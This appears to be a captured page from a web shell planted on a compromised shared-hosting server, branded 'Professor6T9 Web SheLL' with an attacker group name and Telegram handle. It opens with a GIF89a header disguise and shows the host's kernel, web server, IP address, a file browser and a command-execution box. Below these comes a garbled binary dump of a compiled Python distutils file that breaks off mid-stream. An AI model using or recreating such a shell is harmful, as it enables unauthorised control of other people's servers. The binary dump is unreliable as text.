GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python33
/
lib64
/
python3.3
/
distutils
/
command
/
__pycache__
[ HOME ]
Exec
Submit
sdist.cpython-33.pyc
� ��f�E c @ s� d Z d d l Z d d l Z d d l Z d d l Td d l m Z d d l m Z d d l m Z d d l m Z m Z m Z m Z d d l m Z d d l Td d l m Z d d l m Z d d l m Z d d � Z Gd d � d e � Z d S( ua distutils.command.sdist Implements the Distutils 'sdist' command (create a source distribution).i N( u *( u glob( u warn( u Command( u dir_utilu dep_utilu file_utilu archive_util( u TextFile( u FileList( u log( u convert_pathc C s� d d l m } d d l m } g } x6 | j � D]( } | j d | d | | d f � q3 W| j � | | � j d � d S( uo Print all possible values for the 'formats' option (used by the "--help-formats" command-line option). i ( u FancyGetopt( u ARCHIVE_FORMATSu formats=i u. List of available source distribution formats:N( u distutils.fancy_getoptu FancyGetoptu distutils.archive_utilu ARCHIVE_FORMATSu keysu appendu Noneu sortu print_help( u FancyGetoptu ARCHIVE_FORMATSu formatsu format( ( u<